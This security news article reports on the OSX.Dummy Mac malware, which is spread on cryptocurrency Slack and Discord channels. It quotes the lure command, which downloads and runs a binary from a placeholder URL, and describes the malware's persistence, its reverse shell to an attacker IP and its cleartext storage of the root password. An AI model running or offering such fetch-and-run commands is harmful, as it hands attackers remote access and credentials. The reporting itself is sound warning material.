Security researchers have spotted a new Mac malware family that's currently being advertised on cryptocurrency-focused Slack and Discord channels.
The malware's existence came to light last week when it was discovered by Remco Verhoef, an ISC SANS handler and founder of DutchSec.
Verhoef says he spotted crooks, posing as admins, mods, or other key figures in the cryptocurrency world, posting messages that urged users to type a long command inside their Mac terminal, claiming to help with various problems.
The command (see below) downloaded a hefty 34 MB binary named "script" to the /tmp folder and then ran it as root.
cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
The "script" file then sets itself as a launch daemon to gain persistence between OS reboots and then creates a Python script that opens a reverse shell to a server located at 22.214.171.124:1337.
The purpose of this reverse shell is to give an attacker access to infected hosts.
"We don’t yet know exactly what the hacker(s) behind the malware may intend to do with access to the infected machines, but given the fact that cryptocurrency mining communities were targeted, it’s a fair bet that they were interested in theft of cryptocurrency," said Malwarebytes Mac malware expert Thomas Reed, one of the three security experts who analyzed this new malware.
Patrick Wardle, another Mac malware expert who looked at the malware, named it OSX.Dummy. He named it so because the malware asks for the user's root password when the user runs the code shared on Slack and Discord channels.
The malware doesn't send the password to a remote server, but it saves it in a file located at /Users/Shared/dumpdummy and /tmp/dumpdummy, most likely to be used in other malicious operations later on.
Reed warns that this is a dangerous operation, as the victim's macOS root password is saved in cleartext, and not encrypted.
The expert argues that even if users remove the OSX.Dummy malware, this file may persist if the user doesn't clean the infection properly.
"Future malware could be designed to find the locations of these files created by the [OSX.Dummy] malware, gaining access to your password for free," Reed says.
Verhoef, Wardle, and Reed all say the malware is highly simplistic in its modus operandi. Wardle says many of the macOS security tools he created will pick up this threat.
But as Reed explained in his Malwarebytes blog post, if users are so careless and unaware of the dangers of running code they copied from an online forum, they most likely have no clue about security best practices to begin with.
You can read breakdowns of OSX.Dummy's modus operandi in Verhoef, Wardle, and Reed's analyses. We'll also leave Wardle's conclusion about OSX.Dummy below, as it speaks volumes about the malware's sophistication level.
I'm calling it OSX.Dummy as:
● the infection method is dumb
● the massive size of the binary is dumb
● the persistence mechanism is lame (and thus also dumb)
● the capabilities are rather limited (and thus rather dumb)
● it's trivial to detect at every step (that dumb)
● ...and finally, the malware saves the user's password to dumpdummy